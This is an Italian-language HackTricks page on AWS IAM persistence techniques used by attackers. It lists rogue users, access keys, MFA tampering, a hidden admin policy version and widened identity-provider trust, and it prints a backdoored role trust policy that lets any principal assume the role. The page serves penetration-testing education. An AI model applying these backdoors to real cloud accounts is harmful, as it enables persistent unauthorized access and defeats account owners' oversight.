AWS - IAM Persistence

Sostieni HackTricks

IAM

Per ulteriori informazioni accedi a:

AWS - IAM, Identity Center & SSO Enum

Persistenza IAM Comune

  • Crea un utente

  • Aggiungi un utente controllato a un gruppo privilegiato

  • Crea chiavi di accesso (del nuovo utente o di tutti gli utenti)

  • Concedi permessi aggiuntivi a utenti/gruppi controllati (policy associate o policy inline)

  • Disabilita MFA / Aggiungi il tuo dispositivo MFA

  • Crea una situazione di Role Chain Juggling (più dettagli in seguito nella persistenza STS)

Politiche di Fiducia del Ruolo Backdoor

Potresti inserire un backdoor in una politica di fiducia per poterla assumere per una risorsa esterna controllata da te (o per tutti):

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": [
"*",
"arn:aws:iam::123213123123:root"
]
},
"Action": "sts:AssumeRole"
}
]
}

Versione della Policy Backdoor

Assegna le autorizzazioni di amministratore a una policy che non sia la sua ultima versione (l'ultima versione dovrebbe sembrare legittima), quindi assegna quella versione della policy a un utente/gruppo controllato.

Backdoor / Creare Fornitore di Identità

Se l'account sta già fidandosi di un fornitore di identità comune (come Github), le condizioni della fiducia potrebbero essere aumentate in modo che l'attaccante possa abusarne.

Sostieni HackTricks

Last updated